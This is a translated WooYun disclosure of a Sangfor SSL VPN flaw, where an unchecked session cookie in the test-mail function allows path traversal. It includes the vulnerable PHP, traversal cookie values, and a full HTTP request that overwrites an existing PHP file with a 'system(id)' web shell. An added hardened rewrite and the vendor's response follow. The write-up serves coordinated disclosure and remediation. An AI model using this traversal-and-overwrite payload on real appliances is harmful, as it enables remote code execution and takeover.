Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0195091

Title: Sangfor SSL VPN getshell vulnerability (with preconditions)

Vendor: Sangfor (深信服)

Author: 路人甲

Submitted: 2016-04-11 18:42

Fixed: 2016-07-11 11:00

Published: 2016-07-11 11:00

Vulnerability type: Improper design

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-04-11: Details sent to the vendor, awaiting vendor processing
2016-04-12: Vendor confirmed; details disclosed to the vendor only
2016-04-15: Details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2016-06-06: Details opened to core white hats and relevant domain experts
2016-06-16: Details opened to regular white hats
2016-06-26: Details opened to intern white hats
2016-07-11: Details disclosed to the public

Brief description:

Here's one.

Detailed description:

To protect the vendor's intellectual property, most of the code is omitted here.
Preconditions for exploitation:
1. Access to the SSL VPN management console
2. Permission to modify the mail server configuration in the SSL VPN
The problem is at line 147 of sysCfgController.class.php (the "send test mail" function of the mail server settings):

public function sendTestMail($SMTPServer, $SMTPPort, $DestAddr, $EmailTitle, $EnableCheckUsr=0, $EmailUser='', $EmailPassword='', $EmailFrom='', $LanguageType='zh_CN')
{
    // Write the temporary configuration file.
    // The path is built directly from a client-controlled cookie value with
    // no validation, so "../" sequences in it are honoured by the filesystem.
    $conf_file = '/tmp/testmail_'.$_COOKIE['sinfor_session_id'];
    $contents = "[MAIL]\n";
    $contents .= "EnableEmailNotice = \"1\"\n";
    $contents .= "SMTPServer = \"$SMTPServer\"\n";
    $contents .= "SMTPPort = \"$SMTPPort\"\n";
    $contents .= "EnableCheckUsr = \"$EnableCheckUsr\"\n";
    $contents .= "EmailUser = \"$EmailUser\"\n";
    $contents .= "EmailPassword = \"$EmailPassword\"\n";
    $contents .= "EmailFrom = \"$EmailFrom\"\n";
    $contents .= "DestAddr = \"$DestAddr\"\n";
    $contents .= "EmailTitle = \"$EmailTitle\"\n";
    $contents .= "ContentsFile = \"/tmp/smtpsend_test.txt\"\n";
    // The write happens first; the existence check below only detects a failed write,
    // it does not validate the path.
    @file_put_contents($conf_file, $contents);
    if (!file_exists($conf_file))
        throw new FileException($conf_file);
    // ... remainder of the function omitted by the author
}


file_put_contents runs before the file_exists check, and $conf_file is derived from the cookie parameter sinfor_session_id.
So when submitting the request, change the cookie sinfor_session_id to:

sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/1.txt


This creates a file 1.txt under the /tmp/ directory.
How to get a shell? Just write a PHP file into the web root.
But there is a problem here: the newly created file has permissions -rw-------, which means the web container cannot execute the newly created file.
To get around this, an existing PHP file has to be overwritten, using its x permission to achieve getshell.
Let's take this PHP file as the target: /app/usr/sbin/webui/html/appSsoApi.php
So change the cookie sinfor_session_id to:

sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php


Note! This operation overwrites the PHP file above.
Final PoC:

POST /cgi-bin/php-cgi/html/delegatemodule/HttpHandler.php?controler=SysCfg&action=sendTestMail&token=72c791a93959bf388db3af864c09bbee82f2d1a8 HTTP/1.1
Accept: */*
Accept-Language: zh-CN
Referer: https://***/html/tpl/mailMgt.html
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: ***
Content-Length: 122
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: language=zh_CN; USER_CUSTOM_SETTING=1460011919; SESSID=C42EC5FBB05DCD23B13A3384C98E065DC8271CA9AC1B4F433557BC8C4FBC312; x-anti-csrf-gcs=72DFC30A00E3FB9E; sinfor_session_id=W04EDB7D9DC3B2FAAD4A9DD6C23CE9B2/../../tmp/../../app/usr/sbin/webui/html/appSsoApi.php; PHPSESSID=870a66816ba987171730e9b80753da82; x-act-flag-gcs=; usermrgstate=%7B%22params%22%3A%7B%22grpid%22%3A%2238%22%2C%22recflag%22%3A0%2C%22filter%22%3A0%7D%2C%22pageparams%22%3A%7B%22start%22%3A0%2C%22limit%22%3A25%7D%2C%22otherparams%22%3A%7B%22searchtype%22%3A0%2C%22recflag%22%3Afalse%7D%7D; hidecfg=%7B%22name%22%3Afalse%2C%22flag%22%3Afalse%2C%22note%22%3Afalse%2C%22expire%22%3Atrue%2C%22lastlogin_time%22%3Atrue%2C%22phone%22%3Atrue%2C%22allocateip%22%3Atrue%2C%22other%22%3Afalse%2C%22state%22%3Afalse%7D

SMTPServer=<?php system(id);?>&SMTPPort=1&EmailUser=&EmailPassword=&EmailFrom=1&LanguageType=zh_CN&DestAddr=1&EmailTitle=1


After submitting, visiting https://***/cgi-bin/php-cgi/html/appSsoApi.php shows the PHP code being executed:

1.png (screenshot)

Proof of vulnerability:

1.png (screenshot)

Fix recommendation:

You know what to do.
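The fix the author leaves implied, written out as an added example: this is not code from the report or from Sangfor, but a hardened rewrite of the sendTestMail routine shown above. The helper names testMailConfigPath and iniValue, and the assumption that a legitimate sinfor_session_id is a 32-character alphanumeric token (as in the sample value in the report), are illustrative; the real session id format would have to be checked. The path is validated against an allow-list before it touches the filesystem, the resolved parent directory is re-checked, the file is created exclusively so an existing file can never be overwritten, and field values are stripped of line breaks so they cannot inject extra INI keys.

```php
<?php
// Added example (not Sangfor's code): hardened version of the temp-file write
// from the report. testMailConfigPath and iniValue are assumed helper names.

class FileException extends RuntimeException {}

/**
 * Return the temp-file path for a session id, or throw.
 * Allow-list validation means a "../" sequence never reaches the filesystem.
 */
function testMailConfigPath(string $sessionId, string $tmpDir = '/tmp'): string
{
    // Assumption: a legitimate session id is exactly 32 alphanumeric characters,
    // matching the sample value in the report. Adjust to the real format.
    if (!preg_match('/\A[A-Za-z0-9]{32}\z/', $sessionId)) {
        throw new InvalidArgumentException('malformed session id');
    }
    $base = realpath($tmpDir);
    if ($base === false || !is_dir($base)) {
        throw new FileException($tmpDir);
    }
    $path = $base . DIRECTORY_SEPARATOR . 'testmail_' . $sessionId;
    // Defence in depth: the parent of the final path must still be the temp dir.
    if (dirname($path) !== $base) {
        throw new FileException($path);
    }
    return $path;
}

/** Quote one INI value; line breaks and double quotes are removed so a field cannot add keys. */
function iniValue($value): string
{
    return '"' . str_replace(["\r", "\n", '"'], '', (string) $value) . '"';
}

function sendTestMail($SMTPServer, $SMTPPort, $DestAddr, $EmailTitle, $EnableCheckUsr = 0,
                      $EmailUser = '', $EmailPassword = '', $EmailFrom = '', $LanguageType = 'zh_CN'): string
{
    // Validate the cookie value before it is ever used as part of a path.
    $conf_file = testMailConfigPath($_COOKIE['sinfor_session_id'] ?? '');

    $fields = [
        'EnableEmailNotice' => 1,
        'SMTPServer'        => $SMTPServer,
        'SMTPPort'          => $SMTPPort,
        'EnableCheckUsr'    => $EnableCheckUsr,
        'EmailUser'         => $EmailUser,
        'EmailPassword'     => $EmailPassword,
        'EmailFrom'         => $EmailFrom,
        'DestAddr'          => $DestAddr,
        'EmailTitle'        => $EmailTitle,
        'ContentsFile'      => '/tmp/smtpsend_test.txt',
    ];
    $contents = "[MAIL]\n";
    foreach ($fields as $key => $value) {
        $contents .= $key . ' = ' . iniValue($value) . "\n";
    }

    // A stale file from an earlier test of the same session is removed first
    // (the path is already known to lie inside the temp dir), then the file is
    // created with mode 'x', which fails instead of overwriting anything that
    // appeared in between. No existing file on the appliance can ever be clobbered.
    if (is_file($conf_file)) {
        unlink($conf_file);
    }
    $fh = fopen($conf_file, 'x');
    if ($fh === false) {
        throw new FileException($conf_file);
    }
    fwrite($fh, $contents);
    fclose($fh);
    chmod($conf_file, 0600); // only the mailer running as this user needs to read it
    return $conf_file;
}
```

An even simpler option is to stop deriving the file name from client input altogether: tempnam('/tmp', 'testmail_') creates a uniquely named 0600 file and returns its path, which the code can then hand to the mail sender, so the cookie value never appears in a filesystem path at all.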

Copyright notice: when republishing, please credit the source: 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 4

Confirmed: 2016-04-12 10:50

Vendor reply:

Thanks to the white hat for submitting this issue. After confirmation, the problem does exist, but it can only be exploited after obtaining administrator privileges, so the impact is small.
The problem has now been resolved and will be updated in the next version.
Thanks to the white hat for pointing out the problem; please leave your contact details by private message and we will send a gift as a token of appreciation!

Latest status:

None yet